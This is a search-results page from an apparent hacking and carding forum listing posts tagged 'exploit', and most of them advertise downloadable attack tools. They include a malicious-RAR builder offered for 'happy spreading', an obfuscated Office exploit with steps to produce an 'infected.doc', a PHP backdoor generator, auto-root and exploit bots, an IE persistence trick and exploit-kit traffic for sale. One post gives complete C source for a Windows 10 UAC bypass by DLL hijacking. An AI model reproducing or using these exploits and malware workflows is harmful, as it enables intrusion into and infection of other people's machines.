Search the Community

Showing results for tags 'exploit'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
    • Cracking Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
    • Windows Phone
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Premium Accounts
    • Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Cracking Zone PRIV8
    • Cracking Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area


There are no results to display.

There are no results to display.

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start








Found 33 results

  1. Features Extract mikrotik credential (user.dat) Password generator Reverse IP lookup Mac address sniffer Online md5 cracker Mac address lookup Collecting url from Web backdoor (Dark Shell) Winbox exploit (CVE-2018-14847) ChimeyRed exploit for mipsbe (Mikrotik) Exploit web application Mass apple dos (CVE-2018-4407) Libssh exploit (CVE-2018-10933) Discovering Mikrotik device Directory scanner Subdomain scanner Mac address scanner Mac address pinger Vhost scanner (bypass cloudflare) Mass bruteforce (wordpress) Interactive msfrpc client Exploit web application plUpload file upload jQuery file upload (CVE-2018-9206) Laravel (.env) sftp-config.json (misc) Wordpress register (enable) elfinder file upload Drupal 7 exploit (CVE-2018-7600) Drupal 8 exploit (CVE-2018-7600) com_fabrik exploit (joomla) gravityform plugin file upload (wordpress) geoplace3 plugin file upload (wordpress) peugeot-music plugin file upload (wordpress) [HIDE][Hidden Content]]
  2. Since some members on here have started creating "builders" of CVE 2018-20250 and starting to charge money from people who cant use the public CVE themself, I decided to make a quickly website which builds a malicious rar file for you. I did not want to use money on a domain for a free service nor to disclose the server IP so i configured tor and created a onion domain but upon alot of interest, i might make it clearnet and purchase a domain for it, you need either tor bundle or tor browser but tor browser is recommended if you are a network dummy. Tor Browser can be downloaded here: [Hidden Content] The service is running on this onion domain: [Hidden Content] Here can some articles be found: [Hidden Content] [Hidden Content] The RAR-file that can be downloaded contain your malicious file that you uploaded to begin with so dont extract the RAR content on your machine and if you do so then navigate to startup folder and delete the executeable file called evil.exe to remove your malware from startup. Spread the word to stop the script kiddies from charging money for public CVE's and also happy spreading.
  3. [Hidden Content]
  4. Download: [HIDE][Hidden Content]] Password:
  5. Pompem - Exploit and Vulnerability Finder Pompem is an open source tool, designed to automate the search for Exploits and Vulnerability in the most important databases. Developed in Python, has a system of advanced search, that help the work of pentesters and ethical hackers. In the current version, it performs searches in PacketStorm security, CXSecurity, ZeroDay, Vulners, National Vulnerability Database, WPScan Vulnerability Database ... [HIDE][Hidden Content]]
  6. 0x1

    Exploit Pack Priv8

    [Hidden Content] Download : [Hidden Content] More Info : [hide][Hidden Content]] Happy hacking!
  7. Dr HeX Zombi Bot 5.7 Red Evil Best Auto Shell Upload Bot For FREE. Zombi 5.7 is The Latest And Best Auto Exploit Bot Ever. Download: [HIDE][Hidden Content]] Password:
  8. Remot3d - An Simple Exploit for PHP Language It's easy to create a backdoor in an instant, the backdoor can be used in a remote process via a Linux terminal on the server that runs the PHP Language program. Made to bypass the system that is disabled on the server, especially for reading sensitive files that are /etc/passwd Donate If this project very help you to penetration testing and u want support me , you can give me a cup of coffee :) List of Remot3d Functions Create backdoor for windows or linux servers (can run php file) Bypass disable function's with imap_open vulnerability Bypass read file /etc/passwd with cURL or Unique Logic Script's Generating Backdoor and can be remoted on Tools Some other fun stuff :) [HIDE][Hidden Content]]
  9. I am releasing here one of my Silent Office Exploit cve2017-11882 Obfuscation UD as vouch for all members its 7/35 now its alittle old but still good to learn from it or even can use it If you take alook in the code you will found its completely obfuscated and this really more than you look here is the free version its incl obfuscated HTA file as well 1. install python higher than 2.7 2. open HTA with notepad and replace putty link with your direct link 3. upload HTA to direct link 4. open cmd/dos and go to exploit dir and type this cmd : -c "mshta [Hidden Content]" -o infected.doc Download link incl HTA file : [HIDE][Hidden Content]] Password:
  10. //Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass) Exploit #include "stdafx.h" #include <Windows.h> #include "resource.h" void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) { HMODULE hMod = GetModuleHandle(NULL); HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName); DWORD dllSize = SizeofResource(hMod, res); void* dllBuff = LoadResource(hMod, res); HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL); DWORD sizeOut; WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL); CloseHandle(hDll); } int main() { _SHELLEXECUTEINFOW se = {}; //Create Mock SystemRoot Directory CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0); CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0); CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false); //Drop our dll for hijack DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll"); //Execute our winSAT.exe copy from fake trusted directory se.cbSize = sizeof(_SHELLEXECUTEINFOW); se.lpFile = L"C:\\Windows \\System32\\winSAT.exe"; se.lpParameters = L"formal"; se.nShow = SW_HIDE; se.hwnd = NULL; se.lpDirectory = NULL; ShellExecuteEx(&se); return 0; }
  11. dEEpEst

    0day Exploit ReadFile Windows 0day

    [Hidden Content]
  12. This archive is a embed exploit that bookmarks any url given. It all starts by sending IE user in a iframe or any other method to your (index.php?url=[Hidden Content]). Any time a IE user visit the url it will popup a warning and if the user presses Yes it will add your domain to the system and start the website everytime the computer starts. How to use? 1) Upload index.php and add your domain in front of ?url= 2) Send your IE visitors to the url 3) Anytime a user press Yes. Your site url is added 4) Now everytime a infected machine starts the system it will open your url in Internet Explorer. How to remove? To remove is quite simple, open your registry editor and navigate to the key. From there just delete it. Download [Hidden Content] Virustotal [Hidden Content]
  13. Download: [HIDE][Hidden Content]] Password:
  14. Zimbra Collaboration User Enumeration Script (CVE-2018-10949) How to use The argument --host must be the hostname or IP address of Zimbra Collaboration Web Application root page, and --userlist an list of usernames to check against it. root@kali# ./ --host [Hidden Content] --userlist /tmp/emails.txt And it should spill out valid e-mails! [Hidden Content]
  15. CVE-2018-15473-Exploit Exploit written in Python for CVE-2018-15473 with threading and export formats Threading - default 5 If more than 10 are used, often the OpenSSH service gets overwhelmed and causes retries Single username evaluation via username parameter Multiple username evaluation via userList parameter Multiple username evaluation file output via outputFile parameter Multiple output formats (list, json, csv) via outputFormat parameter An example username input file is given in exampleInput.txt An example results output file in List format is given in exampleOutput.txt An example results output file in JSON format is given in exampleOutput.json An example results output file in CSV format is given in exampleOutput.csv Build the image: docker build -t cve-2018-15473 . Run the exploit: docker run cve-2018-15473 -h Delete containers and image: docker ps -a | awk '$2 == "cve-2018-15473" {print $1}' | xargs docker rm docker rmi cve-2018-15473 [Hidden Content]
  16. Buy European traffic for Exploit Kit 1k - $ 4 USD if you have, add me Telegram:@TwoStarMarket
  17. dEEpEst

    exploit PDF Exploit Builder

    Download: [HIDE][Hidden Content]] Passwoord:
  18. dEEpEst

    python UAC EXPLOIT

    [Hidden Content]
  19. Download: [hide][Hidden Content]] Password:
  20. Create specially crafted URLs for Download [Hidden Content] Virustotal [Hidden Content]
  21. 0x1

    Auto Root Exploit

    Auto Root Exploit Tool Author : Nilotpal Biswas USAGE : for kernel version 2.6 all ./ 2 for kernel version 3 all ./ 3 for kernel version 4 all ./ 4 for freebsd & openbsd all ./ bsd for apple macos all ./ app for kernel 2.6,3,4 bsd & app all ./ all Download & Source : [Hidden Content]